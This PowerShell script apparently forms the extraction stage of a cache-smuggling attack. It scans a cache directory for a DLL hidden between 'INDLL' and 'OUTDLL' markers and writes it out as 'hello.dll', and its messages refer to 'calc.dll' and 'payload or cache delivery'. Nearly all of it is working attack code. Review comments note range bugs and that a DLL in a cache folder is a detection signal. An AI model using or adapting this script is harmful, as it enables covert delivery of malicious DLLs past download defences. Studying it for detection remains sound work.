# Directory to scan; the placeholder must be replaced with a real path before running
$cacheDir = '<your dir>'
Write-Host ('Cache directory: {0}' -f $cacheDir)
# Helper function to find byte sequence in a byte array
function Find-ByteSequence {
    param (
        [byte[]]$haystack,
        [byte[]]$needle
    )
    # Returns the zero-based offset of the first occurrence of $needle inside
    # $haystack, or -1 when it is absent or $haystack is shorter than $needle.
    # An empty $needle matches at offset 0. Straightforward O(n*m) scan.
    $lastStart = $haystack.Length - $needle.Length
    if ($lastStart -lt 0) { return -1 }
    $pos = 0
    while ($pos -le $lastStart) {
        $k = 0
        # advance $k while the bytes agree; stops at the first mismatch
        while ($k -lt $needle.Length -and $haystack[$pos + $k] -eq $needle[$k]) {
            $k++
        }
        if ($k -eq $needle.Length) { return $pos }
        $pos++
    }
    return -1
}
# Define marker bytes (ASCII equivalents)
# Both markers are plain ASCII, so each character becomes one byte; the
# lengths noted here are what the offset arithmetic below relies on.
$indllBytes = [byte[]][char[]]'INDLL' # Length: 5
$outdllBytes = [byte[]][char[]]'OUTDLL' # Length: 6
# Get all files in cache
# -File skips subdirectories and the call is not recursive, so only the top
# level of $cacheDir is inspected.
$files = Get-ChildItem $cacheDir -File
Write-Host "Found $($files.Count) files in cache."
foreach ($file in $files) {
$filePath = $file.FullName
Write-Host "Checking file: $filePath (Size: $($file.Length) bytes)"
try {
# Whole file is loaded into memory; a very large cache file costs proportional RAM.
$bytes = [System.IO.File]::ReadAllBytes($filePath)
# Find start of INDLL
$startIndex = Find-ByteSequence $bytes $indllBytes
if ($startIndex -ge 0) {
Write-Host "INDLL marker found at byte offset: $startIndex"
$startIndex += $indllBytes.Length # Move past INDLL to start of DLL content
# Find OUTDLL after the start
# NOTE(review): if INDLL is the last thing in the file, $startIndex equals
# $bytes.Length and this range runs backwards (PowerShell ranges descend),
# so the slice holds two bytes instead of none — an explicit bounds check
# before slicing would avoid that.
$remainingBytes = $bytes[$startIndex..($bytes.Length - 1)]
$endOffset = Find-ByteSequence $remainingBytes $outdllBytes
if ($endOffset -ge 0) {
Write-Host "OUTDLL marker found at relative offset: $endOffset (absolute: $($startIndex + $endOffset))"
# Extract bytes between INDLL and OUTDLL (exclusive)
# NOTE(review): an $endOffset of 0 (adjacent markers) makes this range
# descend as well, yielding two bytes rather than an empty result.
$extractedBytes = $bytes[$startIndex..($startIndex + $endOffset - 1)]
# Output is written back into the scanned cache directory under a fixed
# name; a .dll appearing in a cache folder is a useful detection signal.
$outputPath = Join-Path $cacheDir "hello.dll"
[System.IO.File]::WriteAllBytes($outputPath, $extractedBytes)
Write-Host "Extracted $($extractedBytes.Length) bytes to $outputPath"
break # Stop after first successful extraction (exits the foreach)
} else {
Write-Host "OUTDLL not found after INDLL in $filePath"
}
} else {
Write-Host "No INDLL marker in $filePath"
}
} catch {
# A read or write failure (e.g. locked or inaccessible file) is reported and
# processing continues with the next file.
Write-Host "Error processing $filePath : $($_.Exception.Message)"
}
}
# Final status is inferred from the presence of hello.dll, not from the loop's
# outcome, so a pre-existing hello.dll in $cacheDir would also report success.
if (Test-Path (Join-Path $cacheDir "hello.dll")) {
Write-Host "Extraction successful. Verify file size matches original calc.dll (minus markers)."
} else {
Write-Host "No valid extraction. Check markers in payload or cache delivery."
}